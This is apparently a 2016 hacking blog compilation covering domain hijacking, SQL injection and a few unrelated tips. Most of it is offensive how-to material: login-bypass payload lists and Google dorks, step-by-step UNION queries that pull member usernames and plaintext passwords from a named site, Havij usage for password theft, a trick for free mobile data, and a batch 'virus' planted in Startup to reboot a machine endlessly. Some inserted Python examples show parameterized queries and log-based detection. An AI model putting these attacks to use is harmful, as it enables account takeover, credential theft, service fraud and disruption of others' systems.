Friday, 13 May 2016

Domain Hijacking – How to Hack a Domain Name

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients:
  1. The domain registrar name for the target domain.
  2. The administrative email address associated with the target domain.
This information can be obtained by accessing the WHOIS data of the target domain. To get access to the WHOIS data, go to whois.domaintools.com, enter the target domain name and click on Lookup (you need to register to view administrative contact information). Once the WHOIS data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record: “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case you don’t find this, scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.

Once the hacker takes full control of this email account, he will visit the domain registrar’s website and click on forgot password on the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done, all the details to reset the password will be sent to the administrative email address. Since the hacker has access to this email account, he can easily reset the password of the domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

sql injection attack

Q: What is SQL injection?

A: Injecting SQL queries into another database or using queries to get auth bypass as an admin.

Part 1: Basic SQL injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need to find a site; start by opening Google.
Now we type our dork. Definition of dork: "a search entry for a certain type of site/exploit etc."
There is a large number of Google dorks for basic SQL injection.
Here are the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
The site should look something like this:

welcome to xxxxxxxxxx administrator panel
username :
password :

So what we do here is: in the username we always type "Admin",
and for our password we type our SQL injection.

Here is a list of SQL injections:

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


There are many more, but these are the best ones that I know of.
What this SQL injection is doing: it closes the quoted value early and adds a condition that is always true, so the database gives you auth bypass.

So your input should look like this:

username:Admin
password:'or'1'='1

So click submit and you're in.
NOTE: not all sites are vulnerable.


Part 2: Injecting SQL queries to extract the admin username and password

OK, so let's say we have a site:
http://www.xxxxx.com/index.php?catid=1
There is a list of dorks for sites like this:

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
or the best in my view (full credit to qabandi for discovering this):
"inurl:".php?catid=" site:xxx"


So once you have your site
http://www.xxxx.com/index.php?catid=1
we add a ' to the end of the URL,
so the site is
http://www.xxxx.com/index.php?catid=1'
If there is an error of some sort then it is vulnerable.
Now we need to find the number of columns in the SQL database,
so we type
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"

So this database has 4 columns, because we got an error on 5.
Some databases have 2 columns and some 200; it varies.
Once we have the column number,
we try the union function:
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
If you see some numbers like 1 2 3 4 on the screen, or the column names:
it might not show all the numbers on the screen, but the numbers displayed are the ones you can replace to extract info from the db.
So now we need info about the db.
Let's say the numbers 2 and 4 showed up on the screen,
so I will use my query on 2:
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
The db type and version will pop up on the screen.
If the db version is 4 or lower, then to extract the password you will need these queries:
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
This should display the table containing the admin username and password,
but if not then you will have to guess the table.
So once you have your table (or not),
type
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
Where it says admintablename, type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess.
Once you have the right table name you should get the administrator password.
Then just do the same thing but type username instead of password.
Sometimes the password is hashed and you need to crack it.
Then see if you can get to the admin panel; if you can't, then try the admin panel finder script here http://www.darkc0de..../admin_1.2_.txt
Now if the database is version 5 or up,
type
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables.
Once you have your table name,
type the same thing as for version 4:
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
Then do the same with username.
But if it doesn't work for all those things,
just play around with all the little variations: catid=1 or catid=-1, or instead of -- put /* or even nothing.
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

sql injection cheat sheet

'or''='

1 OR 1=1

1' OR '1'='1

' or 1=1 or ''='

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

What is a sql injection

What is SQL Injection?
SQL Injection - \S-Q-L-in-'jek-shen\ - Noun
The technique of inputting malicious data into an SQL statement, thereby exploiting a vulnerability present in the database layer.

What It Looks Like?
The vast majority of all SQL injections will take place on an input form.
The most basic of all SQL injections will look like the following:

The Basic SQL injection is :


Quote:
Variable' or 1=1--


Let’s say we have a login form. By inputting the above code, we can use our SQL injection to gain login even without proper credentials!

How’s it work?
Take a look..


Code:
SELECT * FROM users WHERE username = 'Variable' or 1=1--'



See how our code is nicely injected into the query? The result of this query will grant us access regardless of the username, since the result of “1=1” will always be true. In this case, we bypass the whole selection process.

You may have been wondering what the double dashes are for ( -- ). These dashes at the end tell the SQL server to ignore the rest of the query. If the exploit isn’t being used on an SQL server, then omitting the double dashes and ending single quote will get the desired results.

Note that while this is the most standard way, it certainly isn’t the only way that malicious users will gain entry. SQL queries will differ greatly from one syntax to another.
It’s also common to see the following:


Code:
') or ('1'='1
"or "1"="1
' or '1'='1
Or 1=1--
" or 1=1--
' or 1=1--



SQL Injection: Attacking Via URLs
As we know, it is possible to attack an SQL server through a URL, and this is usually much more dangerous to webmasters.
When using PHP and SQL, there is commonly a URL such as the following:


Code:
http://YourWebsite.com/page.php?id=2



By adding a little SQL to the end of the URL, we can attack the SQL server.

I think this is enough. Now let’s finally find out how to secure your website from SQL injection.


SQL Injection Prevention: Editing Lengths Of Form Components
The first step in the process is simple: simply restrict input fields to the absolute minimum- usually anywhere from 7-12 characters is fine. Doing so will make long queries unable to be input, since the field is only enough characters for smaller queries. This will actually not prevent an SQL injection, but will make work harder for those trying to make use of one.

Note: SQL injection users can simply make a new form and remove the limits on the character length, since the length is in plain HTML and viewable (and editable) by anyone.

SQL Injection Prevention: Data Type Validation
Another good idea is to validate any data once it is received. If a user had to input an age, make sure the input is an actual number. If it was a date, make sure the date is in proper format. Again, this will not prevent an SQL injection in itself- it just makes work harder for those trying to exploit an SQL server.

Note: This is still only slowing attackers down- but isn’t it much more satisfying to have them waste their time before finding out one’s own query is impervious to harm?

SQL Injection Prevention: The Solution In Preventing SQL Attacks
We’ll accomplish this with a simple function that the developers of PHP made especially for SQL injections. We call this function mysql_real_escape_string() - take a look at it below:

Code:
$name = "John";
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username = '$name'";



Although for a more practical use, we would have the $name variable pointed to a POST result, as seen below:

Code:
$name = mysql_real_escape_string($_POST['user']);



And we can even make things easier by putting it into one line:

Code:
$SQL = "SELECT * FROM users WHERE username = '" . mysql_real_escape_string($_POST['user']) . "'";



So what’s the output like if malicious users try to get access to our SQL server?
Their attempts may look something like this:


Code:
$malicious_input = "' OR 1'";
// The above is the malicious input. Don't be scared!
// With mysql_real_escape_string() usage, the following is obtained:
//
// \' OR 1\'
// Notice how the backslashes escape the quotes! Now users can't enter malicious data



And the best part is, they just wasted their time and effort for nothing.

Lastly, note that there are libraries and classes that can help aid in the fight against SQL injection. Prepared statements are plausible as well, but as for us, we enjoy sticking to the mysql_real_escape_string() function for less headaches.
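
The login bypass and its fixes side by side, as an added example that is not from the original post: it is Python with an in-memory SQLite database instead of PHP/MySQL so that it runs stand-alone, and the `users` table, the account and the function names are constructed for the illustration. `login_escaped` is a stand-in for the escaping approach above (it uses SQLite's quote-doubling rule, not mysql_real_escape_string() itself), and `login_bound` is the prepared-statement form.

```python
import sqlite3


def make_db():
    """Constructed sample data: one admin account in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to mirror the login query described in the text;
    # a real application stores a password hash.
    db.execute("INSERT INTO users VALUES ('Admin', 's3cret-constructed')")
    return db


def login_concat(db, username, password):
    """Vulnerable: user input is pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_escaped(db, username, password):
    """Escaping: quotes in the input are doubled (SQLite's rule) before pasting."""
    u, p = (v.replace("'", "''") for v in (username, password))
    return login_concat(db, u, p)


def login_bound(db, username, password):
    """Hardened: the SQL text is fixed, the values travel as bound parameters."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def outcome(login, username, password):
    """Run one login attempt against a fresh database and classify the result."""
    try:
        return "accepted" if login(make_db(), username, password) else "rejected"
    except sqlite3.Error:
        # Input broke the statement: the SQL text is attacker-influenced.
        return "sql-error"


# The first two inputs are taken from the lists on this page; the third is a lone quote.
PAYLOADS = ["' or '1'='1", "' or 1=1--", "'"]


def matrix():
    """Outcome of every payload against every login implementation."""
    return {(fn.__name__, p): outcome(fn, "Admin", p)
            for fn in (login_concat, login_escaped, login_bound)
            for p in PAYLOADS}


if __name__ == "__main__":
    for key, result in matrix().items():
        print(key, "->", result)
```

mysql_real_escape_string() belongs to PHP's original mysql extension, which was deprecated in PHP 5.5 and removed in PHP 7.0; in current PHP the bound-parameter form is written with PDO or mysqli prepared statements.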

sql injection tutorial with examples

SQL INJECTION:
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.


Imagine that you found this site:

http://www.guitarists.net/



Now first of all we need to find a URL like this to test SQL injection:

id=xyz



Okay suppose we are going with this url

http://www.guitarists.net/links/list.php?id=253



To test whether list.php handles the id variable badly, we append a simple ' to it, and it gives us an error like this:

http://www.guitarists.net/links/list.php?id=253'



Error:

Quote:
Fatal error: Call to undefined method DB_Error::numRows() in /home/gnet/public_html/links/list.php on line 57


Now we will explore it.


The first step of all is to find out how many columns there are; when we get the correct column count, we'll see something different.


Code:
-1+union+select+



This is the basic syntax for this example of attack. Of course it can be done differently, but I find this easier to start with.

Keep adding numbers to guess the correct columns, like this:

http://www.guitarists.net/links/list.php?id=-1+union+select+0-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3-- No results
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3,4--



We got past the SQL error here and found that the site has 4 columns!

The number 1 also appears on the page, which tells us that column 1 is vulnerable, and it is through this column that we are going to steal information.
So now we know we have 4 columns and that column 1 is vulnerable, and we will use:

Information_Schema.Tables

table_name & information_schema.tables--



It helps us to find the table names. Now our link would be like this:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--



Here we replace the vulnerable column 1 with the string table_name.


Note: Here you can see all the tables, but that does not always happen on certain websites, so we view them one by one, and for this you use the term +limit+*,1--

Like:

http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10+from+information_schema.tables+limit+0,1--
...



Well, continuing with our site ...

http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--



As we can see there are a lot of tables, but the one of interest is the table members, because we have to steal data from members, admin, administrators etc.

As we can see there is no table like Administrator or admin, so now we will explore members and check what info it has.
Now we need to see the columns that the table has, and for that we use the syntax:

column_name &
information_schema.columns



And our url will be like this.

http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--



Don't be confused, I am going to explain it now:

+where ---> Where?
+table_name= ---> Name of Table?
char() ---> Name of Table in ASCII


e.g.:

Code:
m = 109
e = 101
m = 109
b = 98
e = 101
r = 114
s = 115



Google "Table in ASCII" and you will get the whole table.

Well, now let's find out what we see in

http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--



w0w, we succeeded in grabbing the required info.

Cheers!!

Well, what interests us are the login and password columns.

Now we make the final injection, to steal the login and password data.

The injection is made in the following way:

To see Login:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,strUsername,2,3,4+from+members--



To see Passwords:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,strPassword,2,3,4+from+members--



There is a much simpler method, which is to see everything at the same time using the syntax:

concat( )



Well, concat serves to unite everything at once, so our URL would be like this:

http://www.guitarists.net/links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members--



Quote
0x3a -> hexadecimal code, used to insert a : between one value and the other, so they are not confused


All passwords are in plain text, not hashed!

Hope this tutorial helps you to learn sql injection. And to understand different techniques related to sql injection.

This tutorial is written for educational purposes; I am not responsible if anyone uses it for illegal purposes.
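
What the steps in this walkthrough and in the earlier "part 2" one (quote test, column counting, union select, information_schema listing, char() encoding) look like from the server side, as an added example that is not part of the original tutorials: a Python scan of web access logs that groups those stages by client address. The log lines, client addresses and stage names are constructed for the illustration, and a client is reported only when at least two different stages are seen, so that a harmless search for the words "union select" does not raise an alert on its own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (common log format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [13/May/2016:10:00:01 +0000] "GET /links/list.php?id=253 HTTP/1.1" 200 5120
203.0.113.7 - - [13/May/2016:10:00:05 +0000] "GET /links/list.php?id=253%27 HTTP/1.1" 500 310
203.0.113.7 - - [13/May/2016:10:00:09 +0000] "GET /links/list.php?id=253+order+by+1-- HTTP/1.1" 200 5120
203.0.113.7 - - [13/May/2016:10:00:11 +0000] "GET /links/list.php?id=253+order+by+2-- HTTP/1.1" 200 5120
203.0.113.7 - - [13/May/2016:10:00:20 +0000] "GET /links/list.php?id=-1+union+select+0,1,2,3,4-- HTTP/1.1" 200 4000
203.0.113.7 - - [13/May/2016:10:00:31 +0000] "GET /links/list.php?id=-1+UNION+SELECT+0,table_name,2,3,4+from+information_schema.tables-- HTTP/1.1" 200 9000
203.0.113.7 - - [13/May/2016:10:00:40 +0000] "GET /links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)-- HTTP/1.1" 200 4100
198.51.100.23 - - [13/May/2016:10:01:00 +0000] "GET /links/list.php?id=254 HTTP/1.1" 200 5000
198.51.100.23 - - [13/May/2016:10:01:02 +0000] "GET /search.php?q=trade+union+select+committee HTTP/1.1" 200 7000
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
CHAR_RE = re.compile(r"\bchar\(([\d,\s]+)\)")
# One pattern per step of the walkthrough; the stage names are this example's own.
STAGES = {
    "quote_probe": re.compile(r"=[^&]*['\"]\s*(?:&|$)"),
    "order_by": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "char_encoding": CHAR_RE,
}


def decode_char(args):
    """Turn the argument list of char(109,101,...) back into text for the analyst."""
    codes = [int(n) for n in re.findall(r"\d+", args)]
    return "".join(chr(c) if 32 <= c < 127 else "?" for c in codes)


def analyse(log_text, min_stages=2):
    """Group probe stages by client; report clients with >= min_stages distinct stages."""
    seen = defaultdict(lambda: {"stages": set(), "decoded": set(), "errors": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        # Undo URL encoding ("+" and %27) before matching, and ignore letter case.
        query = unquote_plus(target.partition("?")[2]).lower()
        hits = {name for name, rx in STAGES.items() if rx.search(query)}
        if not hits:
            continue
        rec = seen[ip]
        rec["stages"] |= hits
        rec["errors"] += status.startswith("5")  # server errors on probe requests
        rec["decoded"].update(decode_char(c) for c in CHAR_RE.findall(query))
    return {ip: {"stages": sorted(r["stages"]), "decoded": sorted(r["decoded"]),
                 "errors": r["errors"]}
            for ip, r in seen.items() if len(r["stages"]) >= min_stages}


if __name__ == "__main__":
    for ip, report in analyse(SAMPLE_LOG).items():
        print(ip, report)
```

The decoded char() value tells the responder which table name the requests were asking about, which is the first thing to check when scoping what may have been read.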

Hacking website with SQL Injection

First of all you need to know about SQL. SQL stands for Structured Query Language. Like every language it has some keywords, such as SELECT, FROM, WHERE etc. To see how these keywords work, suppose there is a database which contains a table of users' profiles. This table has a table name, fields, a unique key etc. If we write the following code
query = "SELECT * FROM user_data WHERE user_id = " + geturlParameter("userid")
this code means: select all details from the user_data table where the unique id is the one taken from the URL parameter.
From the above we have a little knowledge of how SQL works, so we can now move further.

Injection 
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
This injected data could be anything; however, these attacks most commonly use any part of the application that passes user-supplied or poorly processed data to the SQL database.
SQL databases are not the sole target of injection attacks; other interpreters such as LDAP, XPath etc. can also be exposed in the same way.

How sql injection works
Imagine a web application that builds a database query from data supplied by the user. Such a scenario is very common; in fact it is the basis of a dynamic website. Suppose that your id is 32. If you were looking at your own profile page on the website, the back end would be constructing a query such as:
"SELECT * FROM user_data WHERE user_id = " + geturlParameter("userid")
One might expect the below URL to supply the input parameter [geturlParameter("userid")] from the user:
http://www.somesite.com/profile.php?userid=32
Now, depending on how the query is constructed, it may or may not be susceptible to injection. Of course we will examine the case where it is.
Here, if we were to add SQL code to the parameter "userid" in the request URL, we could get the website to execute that code. For example, here we could do something like
http://www.somesite.com/profile.php?userid=32;DROP important_table
The DROP keyword means deleting in SQL. In this example DROP important_table means deleting the table named important_table. With this small vulnerability the whole database is lost.
So through this method data can be changed, updated and extracted, and many more operations can be executed on the database.
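
The `user_data` query above in its concatenated and hardened forms, as an added example that is not part of the original post: it is Python with an in-memory SQLite database, and the table rows and function names are constructed for the illustration. It also shows why quote escaping does nothing for a numeric parameter (the injected text contains no quotes), while data type validation plus a bound parameter does.

```python
import re
import sqlite3


def make_db():
    """Constructed sample rows for the user_data table named in the text."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_data (user_id INTEGER PRIMARY KEY, email TEXT)")
    db.executemany("INSERT INTO user_data VALUES (?, ?)",
                   [(31, "a@example.test"), (32, "b@example.test"),
                    (33, "c@example.test")])
    return db


def profile_concat(db, userid):
    """Vulnerable: the raw URL parameter becomes part of the SQL text."""
    sql = "SELECT user_id, email FROM user_data WHERE user_id = " + userid
    return db.execute(sql).fetchall()


def profile_escaped(db, userid):
    """Quote escaping only: no help here, the value is not inside quotes."""
    escaped = userid.replace("'", "''")
    sql = "SELECT user_id, email FROM user_data WHERE user_id = " + escaped
    return db.execute(sql).fetchall()


_ID_RE = re.compile(r"[0-9]{1,9}")


def parse_user_id(raw):
    """Data type validation: accept a short run of ASCII digits, nothing else."""
    if not isinstance(raw, str) or not _ID_RE.fullmatch(raw):
        raise ValueError("userid must be a positive integer")
    return int(raw)


def profile_safe(db, userid):
    """Hardened: validate the type, then pass the value as a bound parameter."""
    sql = "SELECT user_id, email FROM user_data WHERE user_id = ?"
    return db.execute(sql, (parse_user_id(userid),)).fetchall()


def is_rejected(db, userid):
    """True when the hardened path refuses the value before any SQL runs."""
    try:
        profile_safe(db, userid)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    # "1 OR 1=1" style input from the cheat sheet on this page, applied to id 32.
    print("concat :", profile_concat(db, "32 OR 1=1"))    # every row comes back
    print("escaped:", profile_escaped(db, "32 OR 1=1"))   # still every row
    print("safe   :", profile_safe(db, "32"))             # only the requested row
    print("rejected:", is_rejected(db, "32;DROP important_table"))
```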

How sql injection can be useful in hacking
In dynamic websites the database is created using MySQL, where the user ids and passwords for each user are stored, and it can be tricked by injecting SQL commands.
For this you don't have to learn SQL; there are many programs which can do this for you, some of which are Havij, Acunetix etc.
For checking the vulnerability of your website Acunetix can be useful for you, but for hacking passwords for a vulnerable website use Havij.

Hacking Website with havij
Havij

For SQL injection, the website URL should be in the below format so that Havij can inject SQL commands:
http://www.target.com/index.asp?id=123
Search for the URL and paste it in the field Target: and then click the analyse button.
After the process of analysing the target is complete, click on the Tables button.
Then, after checking the given keyword by clicking on it, press Get Tables.
Now search for an appropriate table name that should contain the password; its name can be login, admin etc.
After finding this table, check the box for that table and press Get Columns. This will show you all columns present in that table. For example, the login table is selected in the below given image.
Here again search for an appropriate column name that should contain the password and check it. Now press Get Data and on the right side you will get the data for your selected fields. In the below image user_id and user_password are selected, and on the right we got the password and id.

Use your USB flash drive as virtual RAM ( virtual memory optimization )

What is virtual memory? 
Virtual memory is not part of the system hardware; it is virtual RAM made on the hard disk. With virtual memory, space from the hard disk is utilised for applications that are currently not in use. It is a very essential part of the system software, i.e. the operating system. The amount of space available for virtual memory is known as swap memory, which can be used for swapping files.
So virtual memory is the part of the operating system which decides how to use hard disk space as RAM.
How it works?
Now suppose your system has 512 MB or 1024 MB of RAM and you are running four applications simultaneously. Your operating system services are also running on that RAM, so with four applications and the system services your RAM space is full. On your next command the system should say that your RAM is full, but it never says that. Why is it so?
This is because all the processes required for your recent activity or for the application you are currently running are kept in RAM, and all the processes that are not in use are transferred to virtual memory or swap memory, so that they can be swapped with the data currently in RAM whenever required.
How these functions occur is decided by the architecture of the virtual memory, which depends on how the operating system is designed to use swap memory. The space available for virtual memory can be decided and manually edited by the user, but it should be at least 1.5 times the RAM size for significant performance.

Virtual memory makes an image file on the hard disk of the same size as the virtual memory, and this file is known as the PAGE FILE. On Windows the page file has the .sys (system file) extension and can be seen by unhiding the protected system files. Here the image shown has XP set for 768 MB of initial virtual memory.


And of course how the virtual memory performs will depend on the read/write speed of the hard disk. If your system has enough RAM to work with, then swap memory usage is very low, so performance remains better, but if your system doesn't have enough RAM then utilization of swap memory increases, which is called THRASHING, and this greatly slows down your computer, because the hard disk is much slower than RAM. This doesn't mean that virtual memory is of no use; it is of great importance for optimal performance, but it can't replace your RAM.

Optimizing system for best performance

What are the conditions for the best performance of your virtual RAM? Firstly, it should be 1.5 times the size of the RAM. Suppose that your system has 1 GB of RAM; then your virtual memory should be set to 1.5 GB. Secondly, the device you are using for your virtual memory should have a faster read/write speed than your hard disk, otherwise there will be a decrease in performance.
To use a device other than your hard disk as your virtual RAM, connect your device (suppose it has been assigned the letter E) and follow the below steps:

  • Go to my computer properties.
  • Click 'Advanced tab' and go to 'settings' under the heading performance.
  • Now again click 'Advanced tab', then click 'change'.

  • Here you have to select the 'no paging file' option for all drives and press set. Then select your device letter, select the 'custom size' option and define the initial and maximum size for virtual memory. Here the maximum size should be 1.5 times the RAM.
                               

Your external virtual memory device can be USB 2.0, an external HDD, an SSD, USB 3.0 etc. But as said, it should be faster than your primary hard disk. You should use at least USB 3.0 for a significant performance increase; if you don't have a USB 3.0 port, buy an internal card to support it, as it is much faster than USB 2.0. If you don't want to buy the internal USB 3.0 card, then use an SSD drive, as it can be connected to a USB port. But the best option will be an express card, if you have an express port and can afford it; it is presently the fastest external card.

Increase your internet speed (only firefox)

Let's see whether it is possible or not to increase your Internet connection speed. Theoretically it is not possible, as your connection has limited bandwidth, but a slight improvement in loading HTML pages is possible, and there will be a significant change in video buffering time, which will decrease considerably.
How it works?
The technique that makes this possible is HTTP pipelining. In HTTP pipelining, multiple HTTP requests are sent on a single TCP connection without waiting for the corresponding responses.
Pipelining of requests gives a dramatic improvement in the loading times of HTML pages, especially over high speed connections. The biggest example of pipelining is used by most Internet users in the form of a downloader. A downloader like DAP uses many connections simultaneously according to its profile.
So connecting to the server with many simultaneous requests can help you out. Follow the steps:

Open your Firefox.
Type about:config in the address bar.
Here you have to change three values. There is also a field below the address bar named Filter.

1) Type network.http.pipelining.maxrequests in the Filter field and
set its value to 50, or any other value according to your connection speed.

2) Type network.http.proxy.pipelining and change its value to true by double clicking on it.

3) Type network.http.pipelining and also change its value to true.

Now close your Firefox and open it again, and you should see a change, especially in the home page and in buffering. Also, if you have a high latency connection then there will be a huge change in your HTML page load time.

Free internet hack for airtel gprs

Use the below mentioned settings on your mobile to access GPRS, but your phone should have zero balance for the following trick to work.

connection name could be anything like xyz

access point name: airtelgprs.com

proxy server address: 99.158.160.201 or 200.57.88.167

proxy port number: 80

homepage: 203.115.112.5 or 202.46.201.112 or use airtel live as your home page

And it's done; enjoy free internet.

How to make a notepad virus

To create a virus using Notepad you should know that Notepad can be used to write the source of a batch file. When we save a Notepad file as .bat or .cmd it becomes a batch file.

Now you should know how to use the command prompt. Here we are using the commands for shutdown or restart.


Open the command prompt and type shutdown in it. This will show you all the shutdown parameters, among which -s and -r are for shutdown and restart respectively, and -a aborts a pending shutdown.

Try using the -s parameter first in the command prompt. Open cmd and type shutdown -s. This will give you a warning and start a countdown of 30 sec to save your work.


To stop this countdown type shutdown -a .

Open your Notepad, simply type shutdown -r and save it as xyzname.bat; now double clicking this file will restart your computer. To auto initiate it, paste it in the startup folder in start>all programs>Startup.

After pasting, whenever the computer is started again, it will restart continuously. To stop this, use shutdown -a in cmd and delete that file from startup.
